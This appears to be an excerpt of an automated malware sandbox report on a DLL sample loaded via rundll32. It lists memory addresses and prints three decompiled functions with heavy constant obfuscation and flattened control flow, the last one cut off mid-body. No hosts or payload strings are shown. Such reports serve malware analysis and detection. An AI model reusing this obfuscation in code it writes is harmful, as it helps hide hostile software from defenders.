                                                                        0x100031e3
                                                                        0x100031f5
                                                                        0x10003201
                                                                        0x1000330a
                                                                        0x10003312
                                                                        0x1000331c
                                                                        0x1000331e
                                                                        0x1000331f
                                                                        0x00000000
                                                                        0x10003207
                                                                        0x1000320d
                                                                        0x00000000
                                                                        0x10003383
                                                                        0x10003213
                                                                        0x10003219
                                                                        0x1000335f
                                                                        0x1000335f
                                                                        0x10003365
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000321f
                                                                        0x1000321f
                                                                        0x10003247
                                                                        0x1000324c
                                                                        0x10003251
                                                                        0x10003299
                                                                        0x100032b5
                                                                        0x100032c6
                                                                        0x100032ca
                                                                        0x100032cb
                                                                        0x100032cc
                                                                        0x100032cd
                                                                        0x100032d1
                                                                        0x100032dc
                                                                        0x100032dd
                                                                        0x100032de
                                                                        0x100032e2
                                                                        0x100032e7
                                                                        0x100032ee
                                                                        0x100032f0
                                                                        0x100032f6
                                                                        0x100032f6
                                                                        0x00000000
                                                                        0x100032f6
                                                                        0x10003219
                                                                        0x10003201
                                                                        0x10003332
                                                                        0x10003333
                                                                        0x10003338
                                                                        0x1000333a
                                                                        0x1000333b
                                                                        0x1000333d
                                                                        0x1000333f
                                                                        0x00000000
                                                                        0x1000333f
                                                                        0x10003390
                                                                        0x00000000
                                                                        0x10003390
                                                                        0x10003349
                                                                        0x1000334c
                                                                        0x10003351
                                                                        0x10003356
                                                                        0x10003359
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: &$L$MX$P:k7$c"$`$l$u
                                                                        • API String ID: 0-1688440420
                                                                        • Opcode ID: c57c8c132fb062cf0c2aaeef19711f7a283d97605f9d3aa3c5ec5f660990e958
                                                                        • Instruction ID: 244f6f35476485b824b653b9f0eb5f1c04093fde2945297bf2edbc57fc600e94
                                                                        • Opcode Fuzzy Hash: c57c8c132fb062cf0c2aaeef19711f7a283d97605f9d3aa3c5ec5f660990e958
                                                                        • Instruction Fuzzy Hash: 4CE131725083409FE368CF25C98A94BFBF1FBC4748F10891DF5A58A260D7B69909CF42
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 98%
                                                                        			E10001658(intOrPtr __ecx, void* __edx) {
                                                                        				signed int _v4;
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				signed int _v40;
                                                                        				signed int _v44;
                                                                        				signed int _v48;
                                                                        				signed int _v52;
                                                                        				signed int _v56;
                                                                        				signed int _v60;
                                                                        				signed int _v64;
                                                                        				signed int _v68;
                                                                        				signed int _v72;
                                                                        				signed int _v76;
                                                                        				signed int _v80;
                                                                        				signed int _v84;
                                                                        				signed int _v88;
                                                                        				signed int _v92;
                                                                        				signed int _v96;
                                                                        				signed int _v100;
                                                                        				signed int _v104;
                                                                        				signed int _v108;
                                                                        				signed int _v112;
                                                                        				void* _t280;
                                                                        				intOrPtr* _t282;
                                                                        				intOrPtr* _t283;
                                                                        				intOrPtr* _t284;
                                                                        				intOrPtr* _t290;
                                                                        				intOrPtr _t291;
                                                                        				intOrPtr _t292;
                                                                        				signed int _t294;
                                                                        				signed int _t295;
                                                                        				signed int _t296;
                                                                        				signed int _t297;
                                                                        				signed int _t298;
                                                                        				signed int _t299;
                                                                        				signed int _t300;
                                                                        				void* _t301;
                                                                        				void* _t313;
                                                                        				intOrPtr* _t337;
                                                                        				void* _t338;
                                                                        				void* _t341;
                                                                        				signed int* _t342;
                                                                        
                                                                        				_t342 =  &_v112;
                                                                        				_v76 = 0x33fd;
                                                                        				_v76 = _v76 + 0xc49f;
                                                                        				_v76 = _v76 * 0x29;
                                                                        				_t341 = __edx;
                                                                        				_v76 = _v76 ^ 0x0027ed19;
                                                                        				_v32 = 0xcc47;
                                                                        				_t292 = __ecx;
                                                                        				_t337 = 0;
                                                                        				_t294 = 0x55;
                                                                        				_v32 = _v32 / _t294;
                                                                        				_v32 = _v32 ^ 0x00006db6;
                                                                        				_t338 = 0x2fa674f5;
                                                                        				_v72 = 0x6a0a;
                                                                        				_v72 = _v72 + 0xffff61af;
                                                                        				_v72 = _v72 >> 0x10;
                                                                        				_v72 = _v72 ^ 0x0000c658;
                                                                        				_v28 = 0xdc12;
                                                                        				_v28 = _v28 + 0xffffa614;
                                                                        				_v28 = _v28 ^ 0x0000bab7;
                                                                        				_v64 = 0x618;
                                                                        				_v64 = _v64 >> 0x10;
                                                                        				_v64 = _v64 ^ 0xcf790140;
                                                                        				_v64 = _v64 ^ 0xcf796a5a;
                                                                        				_v108 = 0x7f72;
                                                                        				_t295 = 0xe;
                                                                        				_v108 = _v108 * 0x4b;
                                                                        				_v108 = _v108 | 0xd60feb69;
                                                                        				_v108 = _v108 ^ 0xd62f8cb3;
                                                                        				_v112 = 0x24c;
                                                                        				_v112 = _v112 / _t295;
                                                                        				_v112 = _v112 | 0xf1ea6f15;
                                                                        				_v112 = _v112 * 5;
                                                                        				_v112 = _v112 ^ 0xb9941bfd;
                                                                        				_v68 = 0xf170;
                                                                        				_v68 = _v68 | 0xaf46648c;
                                                                        				_v68 = _v68 ^ 0xc1ce5702;
                                                                        				_v68 = _v68 ^ 0x6e88e0f6;
                                                                        				_v20 = 0xb551;
                                                                        				_v20 = _v20 * 0x25;
                                                                        				_v20 = _v20 ^ 0x001a3386;
                                                                        				_v24 = 0x298e;
                                                                        				_v24 = _v24 * 0x76;
                                                                        				_v24 = _v24 ^ 0x001331c5;
                                                                        				_v60 = 0x8d97;
                                                                        				_v60 = _v60 >> 2;
                                                                        				_v60 = _v60 >> 6;
                                                                        				_v60 = _v60 ^ 0x0000628a;
                                                                        				_v104 = 0x3b43;
                                                                        				_v104 = _v104 >> 0xb;
                                                                        				_v104 = _v104 + 0x60ed;
                                                                        				_v104 = _v104 << 0xc;
                                                                        				_v104 = _v104 ^ 0x060f18e7;
                                                                        				_v56 = 0x22a0;
                                                                        				_v56 = _v56 << 0xa;
                                                                        				_v56 = _v56 | 0xb5955f6a;
                                                                        				_v56 = _v56 ^ 0xb59ff508;
                                                                        				_v96 = 0xc755;
                                                                        				_v96 = _v96 + 0xffff502d;
                                                                        				_v96 = _v96 >> 0x10;
                                                                        				_v96 = _v96 >> 0xa;
                                                                        				_v96 = _v96 ^ 0x00007dd0;
                                                                        				_v100 = 0xa33d;
                                                                        				_t296 = 0x22;
                                                                        				_v100 = _v100 / _t296;
                                                                        				_t297 = 0x28;
                                                                        				_v100 = _v100 * 0x21;
                                                                        				_v100 = _v100 | 0xc89f00a3;
                                                                        				_v100 = _v100 ^ 0xc89f9ef6;
                                                                        				_v16 = 0x20c7;
                                                                        				_v16 = _v16 + 0xecf3;
                                                                        				_v16 = _v16 ^ 0x00014c0a;
                                                                        				_v40 = 0x76db;
                                                                        				_v40 = _v40 >> 9;
                                                                        				_v40 = _v40 + 0x6d1d;
                                                                        				_v40 = _v40 ^ 0x000061d8;
                                                                        				_v44 = 0x71d;
                                                                        				_v44 = _v44 >> 0xf;
                                                                        				_v44 = _v44 + 0xff5b;
                                                                        				_v44 = _v44 ^ 0x0000e72e;
                                                                        				_v48 = 0x8b38;
                                                                        				_v48 = _v48 ^ 0xf66aca43;
                                                                        				_v48 = _v48 << 0xe;
                                                                        				_v48 = _v48 ^ 0x905ecaad;
                                                                        				_v12 = 0xfda7;
                                                                        				_v12 = _v12 ^ 0xcb86e1f3;
                                                                        				_v12 = _v12 ^ 0xcb86358a;
                                                                        				_v52 = 0x79a1;
                                                                        				_v52 = _v52 | 0x05e61714;
                                                                        				_v52 = _v52 * 0x59;
                                                                        				_v52 = _v52 ^ 0x0d220a4b;
                                                                        				_v92 = 0x6d1;
                                                                        				_v92 = _v92 ^ 0xaab1ecb0;
                                                                        				_v92 = _v92 ^ 0x7a5f7ff4;
                                                                        				_v92 = _v92 | 0x9dbc7c28;
                                                                        				_v92 = _v92 ^ 0xddfeba29;
                                                                        				_v4 = 0xb969;
                                                                        				_v4 = _v4 + 0xffff29a6;
                                                                        				_v4 = _v4 ^ 0xffffac55;
                                                                        				_v8 = 0x80c1;
                                                                        				_v8 = _v8 / _t297;
                                                                        				_v8 = _v8 ^ 0x00007b2b;
                                                                        				_v80 = 0x88c7;
                                                                        				_t298 = 0x72;
                                                                        				_v80 = _v80 * 0x11;
                                                                        				_v80 = _v80 | 0x43e442c5;
                                                                        				_v80 = _v80 >> 3;
                                                                        				_v80 = _v80 ^ 0x087de60e;
                                                                        				_v84 = 0xaa5;
                                                                        				_v84 = _v84 * 0x44;
                                                                        				_v84 = _v84 / _t298;
                                                                        				_t299 = 0x68;
                                                                        				_v84 = _v84 / _t299;
                                                                        				_v84 = _v84 ^ 0x00006b9b;
                                                                        				_v88 = 0x4374;
                                                                        				_v88 = _v88 >> 1;
                                                                        				_v88 = _v88 + 0x8882;
                                                                        				_t300 = 0x1f;
                                                                        				_v88 = _v88 / _t300;
                                                                        				_v88 = _v88 ^ 0x00003aab;
                                                                        				_v36 = 0xe64;
                                                                        				_v36 = _v36 >> 0xf;
                                                                        				_v36 = _v36 ^ 0x5e386e4c;
                                                                        				_v36 = _v36 ^ 0x5e3850f6;
                                                                        				while(1) {
                                                                        					L1:
                                                                        					_t280 = 0x220f80b2;
                                                                        					while(1) {
                                                                        						L2:
                                                                        						_t301 = 0x34935044;
                                                                        						do {
                                                                        							L3:
                                                                        							while(_t338 != 0x12347269) {
                                                                        								if(_t338 == _t280) {
                                                                        									_t282 = E1000D6D8(_v40, _v44, _t301, E1000213E, _v48, _t301, _t337, _t301, _t301, _v12, _v52);
                                                                        									_t342 =  &(_t342[9]);
                                                                        									 *((intOrPtr*)(_t337 + 4)) = _t282;
                                                                        									__eflags = _t282;
                                                                        									_t301 = 0x34935044;
                                                                        									_t280 = 0x220f80b2;
                                                                        									_t338 =  !=  ? 0x34935044 : 0x12347269;
                                                                        									continue;
                                                                        								}
                                                                        								if(_t338 == 0x269b78c0) {
                                                                        									_t283 = E10008997(_v56, _v96, _v100, _v16,  *_t337);
                                                                        									_t342 =  &(_t342[3]);
                                                                        									 *((intOrPtr*)(_t337 + 0x1c)) = _t283;
                                                                        									__eflags = _t283;
                                                                        									_t280 = 0x220f80b2;
                                                                        									_t338 =  !=  ? 0x220f80b2 : 0x12347269;
                                                                        									L2:
                                                                        									_t301 = 0x34935044;
                                                                        									continue;
                                                                        								}
                                                                        								if(_t338 == 0x29978df7) {
                                                                        									_push(_v28);
                                                                        									_t284 = E10005BE1(_v72, _t341, __eflags, _t301);
                                                                        									 *_t337 = _t284;
                                                                        									__eflags = _t284;
                                                                        									if(__eflags == 0) {
                                                                        										_t338 = 0x2b89b2cd;
                                                                        									} else {
                                                                        										E100039D1(_v108, _v112,  *_t337, _v68, _t284);
                                                                        										E100056B3(_v24, _v60,  *_t337, _v104);
                                                                        										_t342 =  &(_t342[7]);
                                                                        										_t338 = 0x269b78c0;
                                                                        									}
                                                                        									while(1) {
                                                                        										L1:
                                                                        										_t280 = 0x220f80b2;
                                                                        										goto L2;
                                                                        									}
                                                                        								}
                                                                        								if(_t338 == 0x2b89b2cd) {
                                                                        									return E100091CD(_v80, _v84, _v88, _t337, _v36);
                                                                        								}
                                                                        								if(_t338 == 0x2fa674f5) {
                                                                        									_push(_t301);
                                                                        									_t313 = 0x24;
                                                                        									_t290 = E100157E8(_t313);
                                                                        									_t337 = _t290;
                                                                        									__eflags = _t337;
                                                                        									if(__eflags == 0) {
                                                                        										return _t290;
                                                                        									}
                                                                        									_t338 = 0x29978df7;
                                                                        									goto L1;
                                                                        								}
                                                                        								if(_t338 != _t301) {
                                                                        									goto L19;
                                                                        								}
                                                                        								 *((intOrPtr*)(_t337 + 0x20)) = _t292;
                                                                        								_t291 =  *0x10021400; // 0x0
                                                                        								 *((intOrPtr*)(_t337 + 0x10)) = _t291;
                                                                        								 *0x10021400 = _t337;
                                                                        								return _t291;
                                                                        							}
                                                                        							E10018C8B(_v92, _v4, _v8,  *_t337);
                                                                        							_t338 = 0x2b89b2cd;
                                                                        							_t280 = 0x220f80b2;
                                                                        							_t301 = 0x34935044;
                                                                        							L19:
                                                                        							__eflags = _t338 - 0x92c1d44;
                                                                        						} while (__eflags != 0);
                                                                        						return _t280;
                                                                        					}
                                                                        				}
                                                                        			}

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: j$+{$.$K"$K"$Ln8^$tC$`
                                                                        • API String ID: 0-3859911108
                                                                        • Opcode ID: 6b84709b704d0638800b18a7bc033e277d2e13a58470b41357cbc58c38864029
                                                                        • Instruction ID: 31beb1e1d2509969b8c97709e2d0e8827b8fffe3f774f18c97f02cb453e1c763
                                                                        • Opcode Fuzzy Hash: 6b84709b704d0638800b18a7bc033e277d2e13a58470b41357cbc58c38864029
                                                                        • Instruction Fuzzy Hash: D9D142715083819FE398CF25C48A40BFBE1FBC4788F108A1EF5999A2A4D7B5D945CF42
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 91%
                                                                        			E1001D530(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                                                        				intOrPtr _v60;
                                                                        				char _v68;
                                                                        				char _v72;
                                                                        				signed int _v76;
                                                                        				signed int _v80;
                                                                        				signed int _v84;
                                                                        				signed int _v88;
                                                                        				signed int _v92;
                                                                        				signed int _v96;
                                                                        				signed int _v100;
                                                                        				signed int _v104;
                                                                        				signed int _v108;
                                                                        				signed int _v112;
                                                                        				signed int _v116;
                                                                        				signed int _v120;
                                                                        				signed int _v124;
                                                                        				signed int _v128;
                                                                        				signed int _v132;
                                                                        				signed int _v136;
                                                                        				signed int _v140;
                                                                        				signed int _v144;
                                                                        				signed int _v148;
                                                                        				signed int _v152;
                                                                        				signed int _v156;
                                                                        				signed int _v160;
                                                                        				signed int _v164;
                                                                        				signed int _v168;
                                                                        				signed int _v172;
                                                                        				signed int _v176;
                                                                        				signed int _v180;
                                                                        				char _t277;
                                                                        				void* _t302;
                                                                        				void* _t313;
                                                                        				signed int _t344;
                                                                        				signed int _t345;
                                                                        				signed int _t346;
                                                                        				signed int _t347;
                                                                        				signed int _t348;
                                                                        				signed int _t349;
                                                                        				signed int _t350;
                                                                        				signed int _t351;
                                                                        				intOrPtr _t353;
                                                                        				signed int* _t356;
                                                                        
                                                                        				_push(_a32);
                                                                        				_push(_a28);
                                                                        				_push(_a24);
                                                                        				_push(_a20);
                                                                        				_push(_a16);
                                                                        				_push(_a12);
                                                                        				_push(_a8);
                                                                        				_push(_a4);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_t277 = E100056B2(0);
                                                                        				_v72 = _t277;
                                                                        				_t353 = _t277;
                                                                        				_v140 = 0xcf77;
                                                                        				_t356 =  &(( &_v180)[0xa]);
                                                                        				_v140 = _v140 | 0x06dd099f;
                                                                        				_v140 = _v140 ^ 0x2b3fcad2;
                                                                        				_t313 = 0x28b49c8b;
                                                                        				_v140 = _v140 ^ 0x2de2012d;
                                                                        				_v164 = 0xc4bc;
                                                                        				_v164 = _v164 << 9;
                                                                        				_t344 = 9;
                                                                        				_v164 = _v164 * 0x2c;
                                                                        				_v164 = _v164 / _t344;
                                                                        				_v164 = _v164 ^ 0x0783a020;
                                                                        				_v112 = 0x2b8e;
                                                                        				_v112 = _v112 + 0xffffae8b;
                                                                        				_t345 = 0x76;
                                                                        				_v112 = _v112 * 0x7c;
                                                                        				_v112 = _v112 ^ 0xffedb6fa;
                                                                        				_v144 = 0xac6;
                                                                        				_v144 = _v144 / _t345;
                                                                        				_t346 = 0x7c;
                                                                        				_v144 = _v144 / _t346;
                                                                        				_v144 = _v144 >> 3;
                                                                        				_v144 = _v144 ^ 0x00001557;
                                                                        				_v152 = 0xab69;
                                                                        				_v152 = _v152 + 0xa2f;
                                                                        				_v152 = _v152 >> 5;
                                                                        				_v152 = _v152 + 0xffff79cf;
                                                                        				_v152 = _v152 ^ 0xffff27b1;
                                                                        				_v108 = 0x73cc;
                                                                        				_v108 = _v108 + 0x480f;
                                                                        				_t347 = 0x59;
                                                                        				_v108 = _v108 / _t347;
                                                                        				_v108 = _v108 ^ 0x000020fd;
                                                                        				_v100 = 0x373b;
                                                                        				_v100 = _v100 * 0x66;
                                                                        				_v100 = _v100 ^ 0x0016182c;
                                                                        				_v104 = 0xe7a6;
                                                                        				_v104 = _v104 ^ 0xf29de3d2;
                                                                        				_v104 = _v104 >> 0xc;
                                                                        				_v104 = _v104 ^ 0x000f640c;
                                                                        				_v88 = 0x7bd1;
                                                                        				_v88 = _v88 + 0xffff741d;
                                                                        				_v88 = _v88 ^ 0xffffa91a;
                                                                        				_v80 = 0x1764;
                                                                        				_t348 = 0x17;
                                                                        				_v80 = _v80 / _t348;
                                                                        				_v80 = _v80 ^ 0x00004d9b;
                                                                        				_v168 = 0x40e5;
                                                                        				_v168 = _v168 | 0x95416268;
                                                                        				_v168 = _v168 + 0xffffdda2;
                                                                        				_t349 = 0x3d;
                                                                        				_v168 = _v168 * 0x7e;
                                                                        				_v168 = _v168 ^ 0x761d93b5;
                                                                        				_v176 = 0x5c39;
                                                                        				_v176 = _v176 << 3;
                                                                        				_v176 = _v176 ^ 0x82f9fe57;
                                                                        				_v176 = _v176 + 0xf301;
                                                                        				_v176 = _v176 ^ 0x82fc4bf9;
                                                                        				_v180 = 0x8c1a;
                                                                        				_v180 = _v180 / _t349;
                                                                        				_v180 = _v180 >> 0xf;
                                                                        				_v180 = _v180 + 0x261d;
                                                                        				_v180 = _v180 ^ 0x00004a95;
                                                                        				_v124 = 0xc582;
                                                                        				_t350 = 0x1d;
                                                                        				_v124 = _v124 * 0x1f;
                                                                        				_v124 = _v124 | 0xf6103699;
                                                                        				_v124 = _v124 ^ 0xf617990a;
                                                                        				_v156 = 0xd28e;
                                                                        				_v156 = _v156 | 0xfa81b7f3;
                                                                        				_v156 = _v156 << 9;
                                                                        				_v156 = _v156 / _t350;
                                                                        				_v156 = _v156 ^ 0x0022cbe3;
                                                                        				_v96 = 0x6edc;
                                                                        				_v96 = _v96 ^ 0x578c8574;
                                                                        				_v96 = _v96 ^ 0x578c878c;
                                                                        				_v172 = 0x2912;
                                                                        				_t351 = 0x52;
                                                                        				_v172 = _v172 * 0x42;
                                                                        				_v172 = _v172 + 0xffffd848;
                                                                        				_v172 = _v172 ^ 0xff29ff1d;
                                                                        				_v172 = _v172 ^ 0xff239d47;
                                                                        				_v116 = 0x4964;
                                                                        				_v116 = _v116 + 0xffff6a3d;
                                                                        				_v116 = _v116 << 8;
                                                                        				_v116 = _v116 ^ 0xffb3a2b5;
                                                                        				_v148 = 0x2770;
                                                                        				_v148 = _v148 | 0xc18e9b46;
                                                                        				_v148 = _v148 + 0xd34e;
                                                                        				_v148 = _v148 | 0xf482d9fb;
                                                                        				_v148 = _v148 ^ 0xf58f8d3b;
                                                                        				_v76 = 0x8840;
                                                                        				_v76 = _v76 << 6;
                                                                        				_v76 = _v76 ^ 0x00221890;
                                                                        				_v160 = 0xa0de;
                                                                        				_v160 = _v160 / _t351;
                                                                        				_v160 = _v160 + 0x938c;
                                                                        				_v160 = _v160 + 0xffff507f;
                                                                        				_v160 = _v160 ^ 0xffff887d;
                                                                        				_v120 = 0xf500;
                                                                        				_v120 = _v120 + 0xffff51ff;
                                                                        				_v120 = _v120 * 0x5a;
                                                                        				_v120 = _v120 ^ 0x0018abed;
                                                                        				_v128 = 0xf1ed;
                                                                        				_v128 = _v128 | 0x9ee1ceb0;
                                                                        				_v128 = _v128 + 0xfdb4;
                                                                        				_v128 = _v128 ^ 0x9ee2bb44;
                                                                        				_v132 = 0xb4e7;
                                                                        				_v132 = _v132 + 0x6d7b;
                                                                        				_v132 = _v132 ^ 0xeb6cebb2;
                                                                        				_v132 = _v132 ^ 0xeb6d8bab;
                                                                        				_v136 = 0x4487;
                                                                        				_v136 = _v136 >> 0xd;
                                                                        				_v136 = _v136 | 0x68b8f7cc;
                                                                        				_v136 = _v136 ^ 0x68b888c6;
                                                                        				_v84 = 0xd92;
                                                                        				_v84 = _v84 + 0xffffee93;
                                                                        				_v84 = _v84 ^ 0xfffffb14;
                                                                        				_v92 = 0x6345;
                                                                        				_v92 = _v92 << 4;
                                                                        				_v92 = _v92 ^ 0x000649ac;
                                                                        				do {
                                                                        					while(_t313 != 0x36a85ef) {
                                                                        						if(_t313 == 0x278fc742) {
                                                                        							E10001CB3( &_v68, _v108, 0x44, _v100);
                                                                        							_push(0x100013e0);
                                                                        							_push(_v80);
                                                                        							_t316 = _v104;
                                                                        							_v68 = 0x44;
                                                                        							_v60 = E1001BF25(_v104, _v88, __eflags);
                                                                        							_t353 = E10009BEB(_v168, _a20, _v72, _v104, _v176, _v180, _v164 | _v140, _a28, _t316, _t316,  &_v68, 0, _v124, _v156, _v96, _t316, _v172, _v116, _v148, _v76, _a8);
                                                                        							E1001C5F7(_v160, _v120, _v128, _v132, _v60);
                                                                        							_t356 =  &(_t356[0x1a]);
                                                                        							_t313 = 0x2f47876d;
                                                                        							continue;
                                                                        						} else {
                                                                        							if(_t313 == 0x28b49c8b) {
                                                                        								_t313 = 0x36a85ef;
                                                                        								continue;
                                                                        							} else {
                                                                        								if(_t313 != 0x2f47876d) {
                                                                        									goto L12;
                                                                        								} else {
                                                                        									E1001B11F(_v136, _v72, _v84, _v92);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						L6:
                                                                        						return _t353;
                                                                        					}
                                                                        					_t302 = E10003A7E(_v112, _v144, _t313,  &_v72, _v152, _a28);
                                                                        					_t356 =  &(_t356[4]);
                                                                        					__eflags = _t302;
                                                                        					if(_t302 == 0) {
                                                                        						_t313 = 0x349a93df;
                                                                        						goto L12;
                                                                        					} else {
                                                                        						_t313 = 0x278fc742;
                                                                        						continue;
                                                                        					}
                                                                        					goto L6;
                                                                        					L12:
                                                                        					__eflags = _t313 - 0x349a93df;
                                                                        				} while (_t313 != 0x349a93df);
                                                                        				goto L6;
                                                                        			}















































                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 9\$;7$D$Ec$dI$p'${m$@
                                                                        • API String ID: 0-4186577645
                                                                        • Opcode ID: ee2cc56ee15b425d2eb46a6a225bda43ef228ac57d8ad856ce1521773d94d356
                                                                        • Instruction ID: 2df3e07cde59ac68a4d410155b42b42f4bafc48a528185daffa6966fbd240ac9
                                                                        • Opcode Fuzzy Hash: ee2cc56ee15b425d2eb46a6a225bda43ef228ac57d8ad856ce1521773d94d356
                                                                        • Instruction Fuzzy Hash: 95D100B15087819FE364CF65C88AA0FBBE1FBC4344F108A1DF6959A2A0D7B59945CF43
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 97%
                                                                        			E10018F65() {
                                                                        				signed int _v4;
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				signed int _v16;
                                                                        				char _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				signed int _v40;
                                                                        				signed int _v44;
                                                                        				signed int _v48;
                                                                        				signed int _v52;
                                                                        				signed int _v56;
                                                                        				signed int _v60;
                                                                        				signed int _v64;
                                                                        				signed int _v68;
                                                                        				signed int _v72;
                                                                        				signed int _v76;
                                                                        				signed int _v80;
                                                                        				signed int _v84;
                                                                        				signed int _v88;
                                                                        				signed int _v92;
                                                                        				signed int _v96;
                                                                        				signed int _v100;
                                                                        				signed int _v104;
                                                                        				signed int _v108;
                                                                        				void* _t253;
                                                                        				signed int _t254;
                                                                        				void* _t256;
                                                                        				signed int _t262;
                                                                        				signed int _t264;
                                                                        				signed int _t265;
                                                                        				signed int _t266;
                                                                        				signed int _t267;
                                                                        				signed int _t268;
                                                                        				signed int _t269;
                                                                        				signed int _t270;
                                                                        				signed int _t271;
                                                                        				signed int _t272;
                                                                        				void* _t273;
                                                                        				void* _t279;
                                                                        				void* _t305;
                                                                        				signed int* _t309;
                                                                        
                                                                        				_t309 =  &_v108;
                                                                        				_v12 = 0x296bf2;
                                                                        				_v4 = 0;
                                                                        				_v8 = 0x4bf1e;
                                                                        				_v100 = 0x2b2b;
                                                                        				_v100 = _v100 >> 2;
                                                                        				_v100 = _v100 ^ 0x417d2759;
                                                                        				_v16 = 0;
                                                                        				_t10 =  &_v100; // 0x417d2759
                                                                        				_v100 =  *_t10 * 0x44;
                                                                        				_t305 = 0x7c03eab;
                                                                        				_v100 = _v100 ^ 0xe5401b0d;
                                                                        				_v76 = 0xb627;
                                                                        				_v76 = _v76 >> 0xd;
                                                                        				_v76 = _v76 ^ 0xc3e66578;
                                                                        				_v76 = _v76 ^ 0xc3e6657f;
                                                                        				_v104 = 0x24d5;
                                                                        				_v104 = _v104 + 0x5447;
                                                                        				_t265 = 0x57;
                                                                        				_v104 = _v104 / _t265;
                                                                        				_t266 = 0x28;
                                                                        				_v104 = _v104 * 0x32;
                                                                        				_v104 = _v104 ^ 0x000071f7;
                                                                        				_v40 = 0x5f61;
                                                                        				_v40 = _v40 + 0xd6ed;
                                                                        				_v40 = _v40 ^ 0x000138b6;
                                                                        				_v108 = 0x6b22;
                                                                        				_v108 = _v108 * 0x6c;
                                                                        				_v108 = _v108 << 8;
                                                                        				_v108 = _v108 + 0x6d5c;
                                                                        				_v108 = _v108 ^ 0x2d328325;
                                                                        				_v92 = 0x5cf3;
                                                                        				_v92 = _v92 | 0xe469743c;
                                                                        				_v92 = _v92 ^ 0x31335b62;
                                                                        				_v92 = _v92 >> 6;
                                                                        				_v92 = _v92 ^ 0x0355473e;
                                                                        				_v64 = 0xc70a;
                                                                        				_v64 = _v64 + 0xfffff4c9;
                                                                        				_v64 = _v64 ^ 0x3b15d897;
                                                                        				_v64 = _v64 ^ 0x3b156e76;
                                                                        				_v68 = 0xfd7d;
                                                                        				_v68 = _v68 / _t266;
                                                                        				_v68 = _v68 + 0x951;
                                                                        				_v68 = _v68 ^ 0x00007938;
                                                                        				_v96 = 0x3fdb;
                                                                        				_t267 = 0x66;
                                                                        				_v96 = _v96 / _t267;
                                                                        				_v96 = _v96 | 0x3c76ff0b;
                                                                        				_t268 = 0x58;
                                                                        				_v96 = _v96 * 0x45;
                                                                        				_v96 = _v96 ^ 0x4c12cf42;
                                                                        				_v72 = 0x1a5;
                                                                        				_v72 = _v72 | 0xb959885f;
                                                                        				_v72 = _v72 >> 0xc;
                                                                        				_v72 = _v72 ^ 0x000bb2ca;
                                                                        				_v36 = 0x7797;
                                                                        				_v36 = _v36 / _t268;
                                                                        				_v36 = _v36 ^ 0x0000700b;
                                                                        				_v28 = 0xb618;
                                                                        				_v28 = _v28 << 7;
                                                                        				_v28 = _v28 ^ 0x005b051c;
                                                                        				_v88 = 0xdec6;
                                                                        				_v88 = _v88 >> 9;
                                                                        				_v88 = _v88 ^ 0x6f8cff66;
                                                                        				_t269 = 0x11;
                                                                        				_t262 = _v16;
                                                                        				_v88 = _v88 * 0x4e;
                                                                        				_v88 = _v88 ^ 0xfcf5e555;
                                                                        				_v32 = 0xe4b;
                                                                        				_v32 = _v32 + 0x98e4;
                                                                        				_v32 = _v32 ^ 0x00008bfc;
                                                                        				_v60 = 0xce72;
                                                                        				_v60 = _v60 >> 3;
                                                                        				_v60 = _v60 | 0xda3ba74b;
                                                                        				_v60 = _v60 ^ 0xda3bee01;
                                                                        				_v48 = 0x9d97;
                                                                        				_v48 = _v48 >> 0xf;
                                                                        				_v48 = _v48 << 1;
                                                                        				_v48 = _v48 ^ 0x000028e0;
                                                                        				_v52 = 0x36fc;
                                                                        				_t270 = 0x70;
                                                                        				_v52 = _v52 / _t269;
                                                                        				_v52 = _v52 * 0x6a;
                                                                        				_v52 = _v52 ^ 0x00012e7b;
                                                                        				_v56 = 0x3c40;
                                                                        				_t271 = 0x4a;
                                                                        				_v56 = _v56 / _t270;
                                                                        				_v56 = _v56 / _t271;
                                                                        				_v56 = _v56 ^ 0x000051af;
                                                                        				_v84 = 0xe49b;
                                                                        				_v84 = _v84 + 0xffff8d97;
